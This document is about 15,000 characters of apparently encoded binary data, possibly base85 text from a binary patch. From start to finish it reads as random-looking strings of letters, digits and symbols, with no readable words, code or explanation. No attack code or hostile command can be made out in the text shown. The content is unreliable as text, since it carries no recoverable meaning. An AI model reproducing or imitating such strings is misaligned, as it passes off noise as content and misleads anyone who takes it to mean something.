z1yME%?pu3ayXWfSG$WPKcc*47ZcB}pomw0mvUI*RZ$w)qU*1r(^%%ckMMC0}V%H@0 z#B@u4a|>>=2D(`quykX=eQW-GY%0gC;1)>w(KGH0@15KKpNHq^a>i7!#~D>*YNW;+ zsqxvy=;-qN&v?wPBy%W@*c;`(q^67;8X{-0%(%UcmYtOKP7HPTr-o|&WyE=h7l!}Y zXz%~b(e6AoezaM#n8$DXC!+<@=%vJvT-K5(MW9f4XlXqvGYhooj1W;l{BQCM0SCj? ze2z0~JtZ%qt(8zqV6r$q_A@~9M4B-{k2?Tah{8XAqd0--Tyvnhx^X$^S~Mz4Ruzp( z!Mx7hLzPx%Wp$$vt`1zF8+iRB4`}*zKnA_Id0l`9z1X5`@s#v!bdoOgJS>~d(uLRs zFIzo%WfHt4_=0qCt-s(v|5EaQ#^HYWq%&DfnT@V?uCGI>TxZT5kfm0@z&CST>RAC{x(f11n9JnRmAwMMz|iCKp^ zL8MtnF^}gUM6kX-5LFIi9PKot-XKZKc3d&OMlGfdATD07n@8`xG-ieg z)%k_$MqT4nnpGjE#{Qp?rJ6fYhA)HfBLL8m_|Wjo5m~O`rjFH_L!JE+CW0Gla8Y1ZPRQSsByupU*3b@w!o*jL(Av;5Md$}yF!C~W z`tSdM4k4lD^5AN!A%jfRK>tHyuaUIl0#;~L`(5aMD_w7Rt4s|pasxWc#cKfuXO{|U zJdHp8*8e!Ia2I?DyEEPfl|2fJ#{Tu#^L84wAGH>_vkG=pMV1iic>pg*klb8$LoiF@ zu*;Yb-+^UEqsGx_^S;L)e;iLCfcAd{_hq-|HYKk_@|LMS>>S++dr3y}?P6T{ld7`| ztmZx$!x9xgx3Yao5d17STcc^`sNd?s*|JREA;~^s?QKt9*9sUzb2_;`HVr>WUD z!I%GeuSmGXbYC+WeddvYL)p0>`!{-XwaWR9t_J^^I4WuIXLdCBXJu5TdIJ2;%XfaK z-0b|GyITLg)Zv*K+XQduvC_*hL*D8vHl$ zTeq9^%&;zBx1aPS59;(y+Zy~Ehro>9TG08Hmn+EXqX6BR^>2?9Nhj(KlcusdI=15I zNBn-|U$L{nKV?sY|LgMtx{?DUlFrfT*GR8DeklcBA|nNB{zzsi)Y-CaBV59klN;cB zub)O$+puWj16`QR;1BViE!1TmJ@fnfH{=Ey#H&F=%TAZ4A(EN9e|E0bw|gj$?tOip zOE>lAN6Df_+2H@$KHB_vE^U3>vMv7V&%8RutI6KnL%4hKPbS_cE%*-Zcmr#L$+`0O zjUB84Gw;pae_L+A+DY(p|*?L5Q$o05pcuk@|U!RLrhx~XMih7L& z(+f_U+022?Jv#pRq7S-u4t`;LBwgXPlgXRh$BSe)UG@VC$F2<_>vz_;7GriIKGbleG6k zN&64?FNB4w&~tQ6#JR?0xO~7P$KW5R>@E9O{bhXYKfs?u`@~nx0KIS;Nb1`EK6#FO z|IiCJQ}g$o21<=R`#Bmex!3N{=N&CdL(*!T2Vk4`5&(z#zH z-gWKo*#FjnOD6d|fj9R5{m8z}$KkQo+P^I`x_`&Mw?^OXe{27MR5847|M%ZK`~&0c z{T&B0E}$}bM}@o#WoTDFU1(vmMTWKj8(j8>HRjQfb&S70_P_J@`-j%~)K>N-28V|l ze20*yhD5vqe3n;#fBy?N$x2jKEmI11P_gTVx)s3I-Lw&o7LvuI z9;Ue)cXaLFap>E3>)sz)ey@G#Q*}rckB?Syj=FHP3U~N%sp%6{?bPJdGrkJgw-C-s zxcTOG!luiWu72n|#k=VACP`gEwW7)^U2^IjiTgk@zIf={GN^XFyVD3_P#g>0SUeJ1 zK)L{rrIFS(^uPbVDcoSS%D5ZM!#PG4b1aFFzei{A@x4FFpZ&kkbJIoU%c-|v=D?-~ z_WL;v^9MGCuC|{a|6X3@+fO((Fxjp{$&IpzJNAEaXus@`gXgZ`S(bC{+=Cf+lD20% zxn(eil5hUI+?Da%>rxJ8tR{`r{o&i_^3{=tMbIPgyrYiCd<8|S5m%G&$SAj8;-#+TzfI>vG& z79hTeU*xU!@y-IsMY#P~b%RwlslnQ(Cy0qK&TD9SIku@GQjZmLI*eZbkM>QBl%0&! z4<5LE(DocE^HElN)^h%Y@1B%woY7$EeuiI73jbx~Hw$cU!}AL!H$)y@N#FMWLjFGg zOPQp1BHxyYh#xiQNV>k?9+jij_g3GDzRvc}T>l>#WXoHkY;66>v(M}b#Af{e(9HfF zPCNVGi8s%SU+9M4>HDPbrS_L-xc%_BUi2O5JCe5j(|u99m`0A&zAm+$lszaAZT|;d z&d+8IWt|7rb>M}6VQ2?_A%6#3zslbd^gi`2cg10z>tON^m>Ul1XJwuc&upj06K`~W zW~Dj*v*K=wJD^?MkcD56%fz)QUbj1KNBrZr_~<~>G#HPEl7Gze8#{oVa)XRtevMCU zKP)yK1d=QpkPwn($LtAucggER^;kL_frWrZktnM!ISLyIW{7~ClMw!F<3nXb4fqzv z`j(CH~WT50|t^-k=3Ya-9yNP6yp*}3NS zG^%75F2v)v+|*-rVD!U_uDI7Y56ICCz#8zJ`3&Pc4U(oLU{m@Q0ZU3Wgl_24IR)fr zisL!(EvHs^)Sr46n(y=%nOwZ$i#5n>=zFuANjkCuO%`Hd|UT}gBiyp<98gUjbo-wgw7?n2pg`dRG$bN zlUTELsJ0|DILxEDWAvB!T>zA@>gs?6Nqx0@zKAc^Pqe`EMJl%fGjUuc9MP^44mz$9 zKBkkRE-0=N4z^(xu3aU3*jDyYosFyhw)%mB9c^VFma^T%MFLf!#<$uha(3ho1Mu2- zK?tTBMm@#Q>!FK?UGyZb~_=_&{$Ywqv!bCByS@ipC$x9dhm zIR{DL8r*Vqt%qrl@oV=?#XPBL#Fc8Ag$#O+-JcG26!^r!h4 zZrJ$j|3B=#dtg-6_4s=xlfVGM85J-J$|#^HqG(XTfQCmPSkOR#5akt;fh2|`CNn$~ zG;tDTJWPwNSX-^7t+v?GmiFrdEocHr0#Xg&R}&=~m0vy6p&AjBV3E0>wa=N!fcW*> zd+#6jj~iIC_t|^x*V=op{aSnNmky3-@(!*&xY`lSjRY2Sg?k`;Ok4Q`Cg<>yw)rW?#I&F_jY;>%3#} zQ)b*VQFST$uua`AW9J&aEnF?syA16Wxnj8BkjM)kx>4xP0pDsRO36cBgSdspW0;1A z82w8JiSFvXH&MrOHBjlbamxn9I9a)|LE>vuS7J8SQFHx`dX9puT)g+BnG4>hO6Cos zxrnwnj4FvJY=|~Z<7@V&O(|WooTn)}7PTcDrwt+%c_Aa>YcoC&e6x0Wbcg#3#py-? z>FHgZGOac5J|^n_4rc}*mKT`O7<$Xx;7YgNm0h@riGOfPTb42YMKX1JS0r#ra0PF7 zzKvtUlx9uq-FwfJ!@aAPwsx&s_yK2)`}MV53$u+SL@(v;zC>Ws+dC{f__QR#E@;}9 z-g7KjUVp=H!fmKhwr3nfk@S?xsU za5k~bI-6kgn9X6%CfFQq?%o`>bGkCwzs8QDo$HMWW;&r7?EClAd@Ro_qaWNt z2?aT8Mk?>tR_bn-LxdJ2ObU){FJ(*aIejs6Az6r!EBcWohKx+FQcYqEq;r_BzdAN%_Fx*`% zUn@`a*Q?PEjP6z+q{i{@@~&jVe(3~*q?bXN`_!{wPaAZ zF2}fCuzAVUl+B`5DM6Vz$l92f3eCGsXDD&YGXBg0g$pO&+0JM-Wc55=0j?e+C6k-! zLBvDjROPov(v$VfHRxopw?}OHx*Bp4`>2ZlSl|6I7dfQN;R~x*cWp%&$=gdmmm!ew z3I5f`rNz%Y8U3zzNwV0UPL|o@B8Q=apBJ=1|*6_8^ zk0@8J{*cNKS1{!B{4C?GKSGihC4@17#S@d6hpNorQH(!!V_ZB~Fd{3~7*BLN2C+&o zRh&9+hD4mMKeT~ZMxNp)%eWg1{h`OOzgET1h=wd(d&~(j7t1{wSRKhZvy7e+MXI4;kQuJYJpkbb=u<^(h?lTc zO?|?6t^9T+`WsyA2NR)h>s;dvagU!d!11WE0o5nclOW(ZC}c+(vU)37NJmbDgdVUM zmNk62t4}G+6#XGVVgNzjZzJTKYm`acu_`(vV%Tgn;>^<{HXB-HdnB{FG4+aXOng*H zQmUEp(cPGOeOF`ZeMV#I?LWOS-ATbDry_DGW9)OEeWUbr8?V1A9r`qh%bxnm>CBTR zArC)iKfy$xC!%f)1*cBWGN184FKXNvnk>2P@SSU{_${$9bS4`45>n(SYe~r*LLq1} zyxTj@B)|>&81&7Fp3#wW8QGsWNdVZ$=Q+kZjMx4L5GeJ1TpdxWBHqg}z7qd1T4QBq zrTRXiI_Qz+63@!ti)fup4<7w7>F){2Nsk|i)DgMZwNpcoFNPi=EPwdj*n{t6BdzLXhN7{YzqEv*kB=3me z&oxesgva(kC?$8?U@o+B|0|3%rM2Q+uUGzBsc+a3$$oCYh@tP@8IE@X7oV%uGK3OgFi^jGT-3~*bxqgFJ=|) z2WzJB%{!`x>U&ZTMpaF9_@+q^g~s7-@V>+b^@JZJ)>NpR23b*QMm=HCv#_Vr*Gwl* z-J7;AaKXU63p-m<4=xJyQJGDRG-PxMGK&i_0&CmlZpvh415?sPFktk5p*x*HWM*nz zpB|hHT?X?H%&7~m;PqA>yUKcEHXborMbvB{088O;cWqOx5x^VprctYBrL znKzYBL{-V5T-)VN%$$>CurY8;U=n)7x(4p;Y+1+($INBgo|RMecY>L=5r}X!qND2A zn(OuYDI<1D_QpNTZ702FS`S~}Y5va>xi^`%Z|&!3mqkRgp0(2ChZ55!>xq@Ni8ReV z3%e^tU)w0VPouZ#leZ!F-R9h}hpVjKUN6IUwGoZsq?g@Tw#iRm#^Dk5$S}bGu4HYe z&)9v)Kw{*Or|r-``q1z8qgi}~Q&OCMe9GLElI(kIB!%{}hJnm#j;HzhKf8Zw$C3V0`*8Y`x8 z0f%MUZj>L+IeF-FvS2*Q;EUPkSf4Itu4n;%_s~ChOv^4Id`BxT&@&qCa?nM-{N$?- znT^Le5jF>W&B%wLmK?=|Cjtw$b2*r1orI3a6;~;A|1O)qDS{%y z1=BRm-gW*l#Nm;c@gdW8QsHw;807;ivno($9$7gpE1MhDoqcAg#M)>X#!v#Ly;E`J z%A~Z6lPfOc?9ji9N-8mIyJi;lUoE`C{=#z{A2p5)Q+_J$|Qe-?feev5(xu@ zVU7~mzx+5u(@|fY&NV$EuankRku-K~Q)N1-+#t1jLZ8#l6+yi@_{>nL4(|P}Ko~hV zE75-Y$@A;%Zv<{T>2E?LRfL&8CL)UEpJULryE5fQfo~g65Y9Ow+BKesw`X+u-_iWb z+Y@i2oA9D?W?=0$S_sWR=D!D>0XVdX)p7^__(XkYn!R!mjX#*Ivj~4u(rzJ$at*{0v352E zYS&|W?GtEcdyCOpS09|4Fjhqp*ti8R=TGbWUstZH{hPAaWA{0b84$7OgzM{gKCSk1 z3eI!#wVz@ZSLCK0sBq{90znC^?+XMsVe$yGvqlDg{TT1uQWAZmWNpN;VB%KpQDRNo zSFt?p%gRK3j5K&8YtwdB_AyH+?}Wn+hp3zm*&+GXRheMEK`HH_Pj!__pN2q9P-35E z2D}~NV>5j-4N=MK&{Z9Tf26C@>54?mebD|apfm*4! zaB5(qGDoD=DL)2lsV>tuSSvM!T#dxS^~>AdQbV@?Syi_XH*wyCfWip`RjA;6W=`N+ z!4~sHu=CAeq4|kW%c|jYt{lbcR|rS_eop=F5XxEgyCD<&^{Q~0Ry{j+?EN3AxnJ7Y zTGc)_N)3H~H6OLA`N-+jEP)v>YNfhWHUGq{W>pdTM#&-7ocx!7s;ab|70XmLkL|8z z#yhiuRn?l+%$-yMO2uvv)2e93HZz?N^(r+V*siFZdApT98m6Nayir%>(iM&9W6WTa z^|xTws+Rv>s^g`9Kdp{=L+S;o&1kcb3NB6zp@kz-eJX(uXN}x%i*@|mxQ?&dL|Tip zwiEg>U90JDcKrU*oSd~E;mUP#|JQW>)2UxNpuBK|2 z8DW&Ve@v|#W3q&eb@uuZL8)dDbCd2t(=;2k-Wdo=Z{_7ebtz-POzFAe!hGM4Fm+p? z<_0NcaH=ho4q@~f)qZ2;<3ySPkL;P8iM=-GkL&#Zj^jrE{uVcqfl;`TG(+J=Ehyf6 zLwbIZS@ZfA!Erwd?2rQeCuFhL)&Fzw_fh3fx*9Aj_Msk1h;fdf$vOPbO5bNnEamn; zD~?R7Ev})a!&!#w4b`e(g9>Zvh*SE9^*k;AWt5QpvV?^GPY0*#Z*>!K5^PE$SF9;e zD~*rJ{1$`xD<>!%Qs`>zqUH3?g&#o;mL%(t=+`>GfJ^Z$yjz9~+0eR2hO4g2SJ;a$ zpNF36+K0x7INs>mhcTtvr7zZhnvlb@lx7~xoKrBP@D8HdBN@>Z8vBa1H3SPL)>d7M zh6xiB#YM&~h>z>48=!p08aGbZR^F@c5L&T;c)pCS+eykSTAs!Ik?5T=bCqf2iRZ6}ceYRr_W-#$3y(URq%&~__`>?cQ&e{)1?b4bT z#3MM@X2uZOD_Phmp_&MMr!(>@7WK8RvYw{m_dUa)Fq-(yB?W1m8%;wrZm6cF zH>5_Qv8kZvM<#?DRhTL=r>ipSYO*sW?F(n^H*{!*!;Rg&Px4Fyu-eGz2GvHk$_>jB zU3Ih(=4?yZowXaKk(nJ2`ks#zl0Ggth$%G9YJt@6QytL`zy*Ud9D=o*@a;}*&mNT; z;_4esBR*Q@;KDcuju%yW&T=CI|PT6$hq|XAL5qU!DN(P6qIsM0X513X(#B% z(o}YRZSpAkl2~|Yl>Q&kCtqWnhup%hhnLoA%4)NVfEK!O`l!)Qo7Bep{#wyj*Ft7*&W+{enB1YzR% zo(NbA_i@$;D^Rt0fbQv6QNS2?D}M2xWi&L4sM6Hfbr#+sDMxvS3>hZxkQ7i^qP~T9 zsPF%ncbJXudwGXsp__NeIP|~e9fGTGR3n}64oUBH-XRDU?@+kk#XCfIz<5FxQgkbLxP1K6!=GX ze|`c-nM>8YAik<{r9u9VFWFOJsFVb`hEt;~x@y#_0e_wL1&uf2eZZ_$8gAw7)*Rey zv|$e?N>Lsq<%qEvs|=&fGN9M%CTXNmrX;A$gThV~+-xz@0nZHnRlOpCzN1EJuhY!D zxkP7^W+hxIqSvUdQr!E_&X0vrsV{Or6-IT!_fg;l)v`LwshW4983hcz@?7|~xqh_D za{2d^rO?U@S52%@UNX*obCgQt=8}Q5oz7ahkrh#Mt>8+VIgsw@d7YJI>QVG|k!b`> zbd#rceq7vJXy46XzrHi=P2Wdmh9Um^*q~qOg!sac%{fbWVqAtLM=|PIgU?H7&7}c_ zFJe&cWljJy!{;ZCB4_J*nprYk&3zf3w$+2{AT-h&y{oxkf?AyfJ9}z_GP#11px4`L zr5en=7S21()~5Qq@blN>OD5I-inj0PX;eydnNFol(7&c^AI8d--rcaIY!d2!SsCxY zrpk6kRop3$xaFFq;EE_OG9T=GL1w#EJ9(zC!oIHGO?R-z=rjB$dNI50m23aPq(j;Z zQgAlu$-o{oXI@pv`^~QK`GxbuNG{A0BdIVGg9FWM<8SLF`D6%tMb!>3K{d{{ynTbU zCD^l!JxDW{w>*uN4d%HibtQksZ&pV&TZzgnL+6|xOm3&>(~>*tdvIf9)T7a(d$u}@ zUAbJHZSSRCKUUqF?ay?PPC+=OuaT&5FN5?P#3~=0hhvjFx28kAVc(3(!esCB=-5P; z8gZUdab7C+Y&7ht1X9GKv)iLP0#mhKsvH}kmhVZ#4bi~I9eL5(8Z^IreR2#@)x$0y z7d0r>n-}o05F1;a*#@U{?4dDSoGXdMl_+dSm1XStH#xFSHdg=HqDYgX2rcW!1cyX) z8(QdfBihpgQXV}sWm+H;Nuv8N=ZhCM5@#9rsHKz;Q~VQo=W(5lt=&_o9Sj$+UBN@5 zU!U?0U^jiA2z&4rQ%r^=oV0BlD)~CnxjR!|oRE_<%lIMZX+w6>gSf2e`(u38*$qS8 zscde}QX*tXH=xgNsC|a@MF&tnGwPZR5eOso(y8FaQ zsBu{=kdd}hru?TJi<(MJ5Le<^c{zyYtUQkZx%w1WT9UTebh*QH>6ez2Xt|6xT~gAL z9G1%n(`8UvQnKZ8q3PmIOLAE*Jx!OPX-WMom#==P(i)SNG~9Ce#B>>#mUOk{a=>&+ zPfHqQxx8k&OioK0ZMpo>bjeIh8e_RUX}U~LOB!dn1jHqJ=4c%Xqnj!%Nu9t`@Io_4 zVp`I1ixhKB7e`uBm*q0qbQzVFer);jg#X zhZ55E41B-y(2y3d3you+1$h9Avw>VhsoJ}Rddy5ZYno`k#XaX5e}K6Jrwl44ubY&0 zOfib_H!5qPSRWDVLo!|$CuA9G_=>!^i7z8a0+AP=5$l7>x>>9%u?8QK;}MB+h6-$^ zm1W$@mw)%<;6t*HCvjh+ya&-q<;$(UM07?{I*+f&i?jJMhN$R8`=XJetn}tbPR$%?ElLpRHp_}2&<`v@pbNzdL7<;#OqxNgZEsBRDCL>}%WJYu~4vNYGQL(-hROoR9 zp?|tabal-&=C{%^s@5uT5l*eFhr1erp2IOQnRWFhyB7&|)%)Y5reFk|za*!%tSI4N zgZDrC+4N)jiL@_Q4iDRd)8KLa(01H^(7^;(WKKWCcWdi-W)5L_m%Tmh%N1>eN4V+` zx*{*-H05G6k|hLZ*&dmGL1f)z;I@c}t%Q|4v|~gwv8T1He45+Iro`!IydEh6Jlz8J zCU?q6<|N30=%G@#3vn*y4zW6Kdc+Y-w>>huXJp-UAj^z?A-ZL(D6A7EX;a;8Kr+c= zSV7TPMhEB@ctN9ak%TL-BM}=-Vkie!Zetp)-IBXpQX$XAnQ}%`t!y&$IZS4n8*00V zi3XwhzfN#Icpj_9+nj%XH`{(7u+c$$`p(pYBkDUlgY#_ue>+wVpb5Sp?lXQ{#FWBh!;-} zff`6vf$v0PHlxZmerV$9wJO(Lx{6ufC^X@|FrFLIK3H*+{aD}yk&|Sza+n?z(jlZ~ z#<)?w%m8NGhtfV+Io^tIhj`kLrM0gd48MwLkBLJ!5$}Ir-yw;aspzV5qUVby@`$g~ z{=MQt)GEDsT1g)G$n@swvIJL=q@Ai*7}zKz3+y-|neOza>K~vY^#ySo@uAf|&!>F? z(e|k#&{Zv1Q7V$8edw(Hnqc||W(|czO_}}cv=1w5mYHQND z!!B5=Ij0?~oX#<*qNCa9L&e`fiDR*V&zk{fcL!8`!wkaP+5MrHiYhdMfYBN;oy@dF zib^H9YJk38#ikRRm0AZA|JdEs-aE`bZgL)_FkH#z^rhGJ9Xli0cPYZC*RXWDkZ}zj zavs7FiR;b{hs?*{FWh6(jK3fjYD)3EQA&RHnCkpTe1X0w{RDF;-?_18;D_<(wC{`X zB{7HIIG{8JWr#;>50bpk&LabhYTv)h_ppTQD|4ust^7jt z^z3#o+-piFi423fMaI^e+z7FzPl&C3BLwh`^O ze@oucB&?Cg0w8rSOZ>;`^?EbQDr5bP;oXT(AaMlQMEVi|o9JWHV;GjK;s^^DnOm7a zUm(-8@KCD|y>g5@L<&9Z;?2Vq!;FJ9Qe2S~<2gZixpD7Xvf}gpW3KTesmM9~`*U-; z6B(`4TzH$q2a5+4R*B5oSF)m6>+nZT`BIE>qVu~o<31H_FQN_Y=Z9^nbz3mg#*5gp z)4vJ3{uUE%xv-;j*l^o@4p;rvOQuYBUFxd;njB-mK{CM;?*ZT2aDoLWK03)l=7=Ti z9CzivS1d&%%$kl&h+cge$00(Fx>N}F7x}oi_4kMw{wiw z50K_A;~6s=~!PZ#QbIiv5Gy$B+6}8&`hOWgegQindP=ZF5>s+8mnT#Q11I~ zcm|n4djr?lB}0g)k5ZKMIn9gg%(}qO4Ie@-1hJkWJJTAx4Pt*&bd<0%K}SilqE1!8 zb;G}jQ!)}Oq+GXH1}CDJRx>!wi{rOAubIC}XMXEPvubZ6i24KTGve#HO@`O-K+z*} za;Cgj=s{_)Q=pjB;d4pXHYHaCjixT9dAe zoIjEWP@OeSe*InNIDaJjPHZysTbz(PqTag-_U0}28%bVyW8PW&B!~?eZ6z$VCF!?d zO}t-#qt+@b+SUa}TD4%t;noF5TYF@+E;w$D1Mkvuowd2(8J|~6{as3k&@{dgx)Q8en>y%&u91G$3Z32CZ8geI+8cn^`R zQQ4&avDb+G@1}jd*yS-UE3cs!l>IQ%pfj`oy%a@D)~~9BnwJr{HRE{eCCt*48iZfI z7(dj^L?p+Qmw~CW*5ACrcU#P9Hcle4^U;TGxw)+^9lIyrJK}KPP2=snjoLb=OQdYB zQz%{Ug#<+ql6V*)+>3+baAIpS!aLDh2*mTUh#|Fngpgf(WbBN7zBK<@RGa!*jOGI$ zwsq`Iy4Ts-!ac;Klv|)fhUz{8ref zRah%(+3IU;mQnQ@;n>dF2XScmtTn@BW@Li1rjjn$+@f+t+V?FXS|dCk*;ik#V)EG_ zn`DzZQeks*n-A!X5@dq!{O*E?%&40y>w~Q5?sbaGIa1EylvAiA%_*goCr^YKWb21# z&O{Z3e|O>>{qDp-$II z^VWu^?o{|ZJ)^F5ip$^jiNDd_x?n2;e-bn}#gR1=RYj6K7wf7JHsvA}r!~6DQK2xW znMMz8L-}uUpxU;dk@HtMdJvtb_hOSRCkJbA?Ht-&v~eapuNtTRiTM<@j9Ry{Fq1o6 z^dEGqZDpg#)R4$Vk*1H*-$5%`R0oZv*-Gh_kz_uGXb4(|&oMTxmA)XOoEo8GmzUI- zvd6fTG%Pi0>V3)Ol8QB^AN@{Eigya(qwPDUMyeL9$o@jWW z@j4`y_?j@S;Vo2vQ@mO=kqUI=7=?;F?0O|4LU;SGL>&(YOuk+n>eU{buMd*1zCj)7 z^LX{WIKdbTda+G!H%3V~ZUT85bBv*4XCOIh4tp<}!yd1u8>44#9K4NM0QEvsL#`!ih;^&w9so9{#hGI>dqdyvTw zJ5WBpnL)~|1D2-9vDmykN5NB3=~d&H{~fnR&bh{iG%>jy*uzM1F=$L-nit*VpeK2{ zl%7Q)$sx3ju3mm5Bz2yPWh)W+<~{|9H_o!(b|mhdaK` zKh39?bMtpt)dM_#S2dW+GtQQAL)9H$f7=5*&h`Lu-45TJPzw=lu)=$<|4+gug=z_l zGHq@d8xwc2WR}KH*WVRHM~U&Tosr0_CrQ*hotz|FmzaCBjBIq+T?};SLs*D`=;VZ! zqg){V!qU> z5FeE~{hKI-saj`v7rJVi&{cCkI(B9!wJVRWQFL=?-*Y^ksClQ4kHGKNtX=B-a^Lvt znU_D%XQ}g@>88pYboE>lxo_wzN9C;iXiVo!KhZf8RXCH+xfwG+(Xg{Cnu9M<;xin@ zIXmlnj2E3bYle-#o_WdxTO|*5sPBm-)0(6)h>+UOi`($+0ouia1`16|MXgq7 z=7T$GL-cR*Ku)&td)hEBHB3n~LNrtV{fP*gCBvrs6sPBMYN6iNd08WEK7v#F@vu$; zl_xq0dB;I?-SrTq`LfC@=Juq$5YO~N2bqcVcf&Y-Ba_x$(YY#%yslI1ahpsfIu~b3 z&~g%80NnMDvC*aajB{QQB|l5``lUm5E=}9%OO4G(s+q^-=E|s+5*y#73vw+7h4Kh) za!*L)aTn}zzO)yq=PIIMl)0ocgDn7>A#X>q+;eue4BYGgXhX0Xe{dxmpUDJ9rZ35+ zXIpRrv5LL=BiZ%|R?Fpdi{+>QGAYWD5WQMkQX`>16V=?My6+t4OM9M^{QK6(;m{mM zCoPnu6WKZ|{-EVG`^iYeoFgdS0h{c|ILGB1Y~LH0k<9h&9=y1O&3^C>arYV$Wnhlu z<-g%cGSGnZpLgu#hzO9C$>=#m#q#ZJ4u)3DSbDU_kKDK-H&lX<){w_-d-=au6&5 zZtar?oBBg6(+N%8e9I(o0lE*U%Py(QA^Vnc@-FXY8D{0mIlQWso`+X0!LH4`H9{@-*vvjfv7Ok_dG2pZu-E;sCr!+l+`&n_8<7>MbQl{= zQjyuqWtNkL58%QtIXKA;hB>FXhvq~$1o0%$LSg7!Y7fGzn8{qpUgxmZNhv7pNok!w z)Wtk-J_@ZSxtJLf4{KTWF1RuoPRTJY#M+QJRAxnUjdnf=$BCykDewJ<*t|zo2Rwrv zXCBM>l1Iurb~(HQIx<`~FFV~v8)0+(|L6>DphfDt&|MB`T-+FIFg^YqT8T%;F60J8 zp&Q{G&YBI_iXFx?piu3(FUvl{kb3WIbvM_0(|Eaif1e5b|s$wkK9$w``s#ATdpozvd(+4wiP z3$V6lYUG2xQ^UC*aC6G+Yqp7cM#sz2_jr!p-{?X)Ler4K(a4Raj*NDi75gx@ zsRxXX47p*_?sdrcScUDt^5de}|Gn0Xc6u?&PGmKk!VDoYwKlQ{^~EmZ2QW%1v}9Mu&P41oA53<1>~uu!i5)vR6*b)xI(E9b zD4*fzHIJ-C8}AKf!dz< z&2#(Lx_MzvB3SJHh~-?1tXEp*$xcYGd5ihg7Yy<*UW}Kc#ojUxkwA%ef?KVs5&{$4 zvILYct+6opFBqgxSR6%>SX%9^^RkSm>EJ=muz3_jV>^A7JWDmh(J{f{^4k5EpTgo0 z%fGQCilq|^igf&!e~!f_mJfB?E0HgyJJ>}DMUM4?%`SA^}K1Uct*sb>%7NJM= z74{J55#|-4VUbSxreTLayL5nVT!j;@Q>e1V>m#)holT z7OD~7aE>r};!z&OWLkTo@i04P^`iQ}*-5;@6tN zK#?4q%gk(Dd-DB{ov-m^Ol*}n^U0RA+*^}w*?C~;kQpb@G_zEVuU#$6yH3NUN|~)o zC+_|J$ZfaUUGFbA`K0t%(br?Tu#5I2AHoU1*$s}kNH_1*@|kG)Yi;I>zS9yGkM3+d zN!CtJY!2L}b7$54^o3aX@)8q8it=T50~u_j`b2{6_Ktjs3GYMcA2 zwwS)XbI6{wJqvw~>b=sz!WV&&4u*WwYQw$xcJrOk=dDG$JT$2UEzHEn)8@Pjgf~d) z!WSfA;R%we@B>Lwc!8B3_-CefiIur%dgt&h`R+mb6z0q%2a`wdT@tlzLU%&Zgr(2y zg+WP|+3Ti&V85BbL*eT`R;)+9RrBpQ%1PNJe#G*loJz<$PXY`J~*R6FCB}si9G)&XOeLjVk2JLSU;hg}M@y8Wh4xSgb-*HK9dWA2wJUJUG@rVQfmHl)Rm} z_DEo@5m#0HCG>e$+K61^ZL5Rl zQ&{+ZS9b)tDuTUc1bfX0_L>pwH6wVd&py3=QFuHnnv<;9>Tjiqz?WfD^Mu*jnHvaW z#$=8q={GX@k_li?6Wct^ie-|#Dx6-~6m4O8)O<$tpY@%rDzrEe1) z9%oiIO!~1Vic2Rwt`#v$t21oy`xS=iQ5EjCkl)^@PC7)5}y=VDL_^_jVa6?py6~CzNQ{saQkMd3YBZF0UesWGHcEx(qgHTrHczWh8A z$z(gGD`Dk1Jn}Ti#AnAkpJ1&?O-B-3*;Gz*y;>9x8d{uO>nQq#dY4?^@c#Ku=K(f&gq&#Zfjt z(EpGu{*CAiN#(Y8by|Mq@;3ANBmaFayLGHOso!{a(oZh*_8)(#80U6p*-{O zbdeh|LX6s`!meSAKl+o|{nrsD;_5jXur)dN|Y_x|czrJ%kQ{s&xk zU%5W@e=6Y2$Vwz1)$x53n-kgk9Vx7NuJ_-|6l3eb_^u+j9ry^9ymHGcL4?L*#w zmIjC?9y}II%t=Njlo4DIc`Cj<9+5_Nej|-+@-Nu$qHWU4ZJYz&pCW5ej#lJQQQFvD zWS8^gU9z)fRDtolfG>?rR_%i=3F#^a)E)njJdF{#bF$hgM(oHdD0 zD(>?=8K2v-j0@d-jGaTWYU)#p{RZiidKP9*dw_-Iyk8_YIOG)ogmUgKf zIf3f}_aqu_!ff00#{|y0*x4B+J#*ue^e4kNjZ9{vv_;-=-i0o#sfoT3de6BWdRh{G zhzq`h`y$5=5YX?bm&b}K9%vImBhv}me18IQ%GX`nruQykOU0T5jI{&t;caDqeRAkF zW^=`(x6Kq1T}6gc-*3n`lJz#Sz6%Tl6f&_{ZJhVrPeP2kEW<~uVU-=s_>%9V>lTP{ zOi?D6Z3MKh5^(>a1Xq@^u%}{1$a@*TgVPB2pntT#9P1z7>K)Q7N?>8Bb-C$rZIl)Y zk0dxWg^wa^=Fj8Rvb4HNnavk1&gp&I&jXlxqj2`H}6(^CQy z2H}=0U8E;y!aiheL(Kl8i@T5Bv-Os_Jap(A5S+2e`2EG`O_}|$bo5PG#&bQOSifBT z%i!8AyfZsz3tDZezgB&@!rx{0E!St%Ri9AIiYE&cw{lgVQ0&UVQwGAX=BS6Fq&xf9 z?$*3Tcb|F&vpGuw+77 zIhYmE2M;;qO+?W`lkk{x&{=Zch<#}@k}LWIlg|%0uND`w%V zEnm~U*>r!8_kaYUlY`&L1HNr7^M|Gg?A=xDDjc;QwmO*kiah<;wr;_vFru^tF7H70 zXie!dX^wLcFi5s#I3|G;Zrf^Gm+@&-q!7^)%@|4qJNs$+g0@F8KIN_xGo2LlZz|c- zA8v#<$=F8&W?n-B%N%EKbiOp9pYx?$R5Pd8>v?u`py-e*Pe!V`m!9dcznONTqW469 z-SD(S6^6(`(9GhiTTKQ|6=sq9!o|C6(HQ}hCjrH2uFL33eI4G}ZcYpW9yqR2_*O`U zT}s`jf458qXOpjy;+AFl%z{dOxqsljSx+BYZw&5iLWk+P zE)*4HRcXFQwaW z5Pm6i#o=^CX}tYZSCpRXqD!{xyXa>rbjLkn+7E=M(!T|hCMq}w!UtMZ*L-G_N&@Bh0zK>0H)ETRLT76XCrytT=B&j=mQMUyP7YXaA zI+0%4zv_g$vWN4JO^5!uOPE9zdRh!foqBMW;$Mj)8d3h-G^A1AJq&rfNLu5uiavUM z?qld(OB{M^*GSnwCsGf7=`3?Db$-svL|*m=yl*UZ zzPoQoqb~(>?~q34j(U3ox0*AW2!P_za8ouOEkl|Qe1x{<`XPT}#P9_?!d#dT^3zMat#JALWbNv60^7{&okwZLC^lsOXuYLV2-*g^yBaU~wm_{9SZhzOlGrWVsqts<@`;Q#ZQi0?#UkXT87Z3T+s>dF%_mXi10oFB2i*=p zwce*wEe!P(<>W>w?-qp*JGa-{<)x_iShTvF8THiGBgCJrH1E;sbk1kxK(1R0C$s9E}@f*`PDTbn1F*E3+S;md)Wy0)`mmM5I7BjcK 